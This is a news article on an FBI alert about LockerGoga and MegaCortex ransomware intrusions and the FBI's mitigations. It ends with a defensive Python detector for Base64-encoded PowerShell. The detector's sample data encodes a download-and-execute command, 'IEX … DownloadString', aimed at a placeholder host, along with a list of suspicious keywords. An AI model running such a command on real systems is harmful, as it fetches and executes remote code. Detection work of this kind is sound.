The FBI has released a TLP:Amber alert in response to a number of cyberattacks involving the ransomware strains LockerGoga and MegaCortex. The threat actors employing these ransomware variants have been focusing on large enterprises and organizations and normally deploy the ransomware many months after a network has been infiltrated.
LockerGoga was first discovered in January 2019 and MegaCortex ransomware was first observed in May 2019. Both ransomware strains exhibit similar IoCs, share similar C2 infrastructure, and are both used in highly focused attacks on big corporate networks.
LockerGoga was used in the ransomware attacks on the U.S. chemical firms Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consulting business Altran Technologies. MegaCortex ransomware was deployed in the attacks on the accounting software firm Wolters Kluwer and the cloud hosting firm iNSYNQ, among others. The threat actors are meticulous and methodical, and try to cause maximum damage to increase the probability that their victims will meet the ransom demands, which are often of the order of hundreds of thousands of dollars or higher.
The initial compromise is achieved through a variety of methods, including the exploitation of unpatched flaws, phishing attacks, SQL injection, brute-force attacks on RDP, and the use of stolen credentials. Once inside, the hackers run batch files to stop processes and services used by security solutions to ensure their presence is not discovered. The hackers move laterally to compromise as many devices as possible using the penetration testing tool Cobalt Strike, living-off-the-land Windows binaries, and legitimate software tools such as Mimikatz. A beacon is added to each infiltrated device on the network and is used to run PowerShell scripts, escalate privileges, and spawn a new session that acts as a listener on the victim’s system, according to the FBI warning, as reported by Bleeping Computer, which obtained a copy of the alert.
Unlike many other threat actors, who deploy ransomware soon after a system is infiltrated, the threat actors behind these attacks often wait several months before the ransomware encryption routine is triggered. It is not known what the threat actors do during that time, but it is likely the time is used to exfiltrate sensitive data. The ransomware is deployed in the last stage of the attack, once all useful data has been obtained from the victims.
The advice provided by the FBI to improve security is standard for stopping ransomware and other cyberattacks. Cybersecurity best practices should be adhered to, including backing up data regularly; storing backup copies on non-networked devices; testing backups to confirm that file recovery is possible; setting strong passwords; patching quickly; enabling multi-factor authentication, especially on admin accounts; ensuring RDP servers can only be accessed through a VPN; disabling SMBv1; and scanning for open ports and blocking them so they cannot be reached from outside.
The FBI also advises auditing the creation of new accounts and monitoring Active Directory for changes to authorized users; enabling PowerShell logging and monitoring for unusual commands, such as the execution of Base64-encoded PowerShell; and ensuring only the most recent version of PowerShell is installed.
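A defender-side check for the Base64-encoded PowerShell invocations the FBI advises monitoring, added here as an example and not part of the alert or this article: it decodes the UTF-16LE/Base64 payload behind any abbreviation of -EncodedCommand that PowerShell accepts and flags common download-and-execute keywords. The log lines, their field layout and the keyword list are constructed assumptions, not data from the alert.

```python
import base64
import re

# Matches "-e", "-enc", "-EncodedCommand" and other abbreviations of the
# switch, followed by a Base64 argument of at least 16 characters.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Keywords that make a decoded command worth a closer look (assumed list).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring",
              "frombase64string", "-nop", "hidden")


def ps_encode(command: str) -> str:
    """Build the form -EncodedCommand expects: UTF-16LE text, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(line: str):
    """Return the decoded command carried by a log line, or None if absent.

    The flag must be a prefix of 'encodedcommand' (so -ExecutionPolicy does
    not match) and the payload must decode cleanly as UTF-16LE.
    """
    m = ENC_FLAG.search(line)
    if not m:
        return None
    flag, payload = m.group(1).lower(), m.group(2)
    if not "encodedcommand".startswith(flag):
        return None
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(lines):
    """Return (line, decoded_command, matched_keywords) for encoded launches."""
    hits = []
    for line in lines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        text = (line + " " + decoded).lower()
        hits.append((line, decoded, [k for k in SUSPICIOUS if k in text]))
    return hits


# Constructed sample lines shaped like a process-creation CommandLine field;
# the encoded payload is generated here, not taken from a real incident.
SAMPLE_LINES = [
    "4688 CommandLine=powershell.exe -NoP -W Hidden -enc "
    + ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    "4688 CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "4688 CommandLine=powershell.exe -ExecutionPolicy Bypass -Command Get-Service",
]

if __name__ == "__main__":
    for line, decoded, keywords in triage(SAMPLE_LINES):
        print(f"ENCODED: {decoded!r} keywords={keywords}")
```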